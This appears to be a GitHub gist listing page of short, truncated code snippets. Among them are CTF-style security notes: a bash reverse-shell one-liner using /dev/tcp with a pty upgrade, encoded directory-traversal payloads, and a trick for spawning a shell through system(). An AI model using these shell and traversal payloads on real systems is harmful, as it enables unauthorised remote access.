This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import faker | |
| import random | |
| from string import ascii_letters, digits | |
| fake = faker.Faker() | |
| def main(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import faker | |
| import random | |
| from string import ascii_letters, digits | |
| fake = faker.Faker() | |
| def main(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // #include <QApplication> | |
| // #include <QClipboard> | |
| // #include <QDesktopServices> | |
| // #include <QFontMetrics> | |
| // #include <QGraphicsSceneMouseEvent> | |
| // #include <QIcon> | |
| // #include <QPainter> | |
| // #include <QPalette> | |
| // #include <QTextLayout> | |
| // #include <QMenu> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| call denite#custom#var('file_rec', 'command', | |
| \ ['ag', '--follow', '--nocolor', '--nogroup', '--ignore=*.pyc', '-g', '']) |
nongiach
/ main_arena
Last active
January 31, 2018 20:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| int main() { | |
| char *a = malloc(1034); | |
| char *b = malloc(0); | |
| free(b); | |
| free(a); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # or => https://github.com/0x00-0x00/ShellPop | |
| bash -i > /dev/tcp/127.0.0.1/12345 2>&1 <&1 | |
| or if socket already opened by father | |
| for fd in {3..255}; bash -i >&fd 2>&1 <&1 & done | |
| ================================ now with a real tty: source https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ | |
| # In reverse shell | |
| $ python -c 'import pty; pty.spawn("/bin/bash")' |
nongiach
/ Directory Traversal Checklist
Created
February 12, 2018 10:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Directory Traversal Checklist: | |
| 16 bit Unicode encoding: | |
| . = %u002e, / = %u2215, \ = %u2216 | |
| Double URL encoding: | |
| . = %252e, / = %252f, \ = %255c | |
| UTF-8 Unicode encoding: | |
| . = %c0%2e, %e0%40%ae, %c0ae, / = %c0%af, %e0%80%af, %c0%2f, \ = %c0%5c, %c0%80%5c |
nongiach
/ get all network interfaces except lo
Last active
March 14, 2018 14:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| grep is better than awk for cross system | |
| ip a | grep -o ':.*: ' | grep -v ': lo: ' | grep -o '[^ :]*' | |
| ip a | awk '!/: lo: / && match($0, ": (.*): ", a) {print a[1]}' | |
nongiach
/ trick to spawn shell
Created
April 9, 2018 15:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @moyix | |
| Another CTF trick: if you need a string for system() that will get you a shell, consider the humble "ed". It supports running shell commands (!), and b/c of English past tense is often available as a suffix of some existing string in the binary, e.g.: "File transfer complet𝙚𝙙" | |
| @chaign_c | |
| It also works with "ex", "vi", "sh", "vim", "gdb", "ftp", "php", "irb" I don't have ed on archlinux. ls /bin/???? if you want more. |
nongiach
/ clize demo
Last active
May 9, 2018 09:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # https://github.com/epsy/clize | |
| # pip install clize | |
| import clize | |
| def exploit(target, motivation=42): | |
| print(target, motivation) | |
| def fuzz(target, tool="afl", *, share=False): |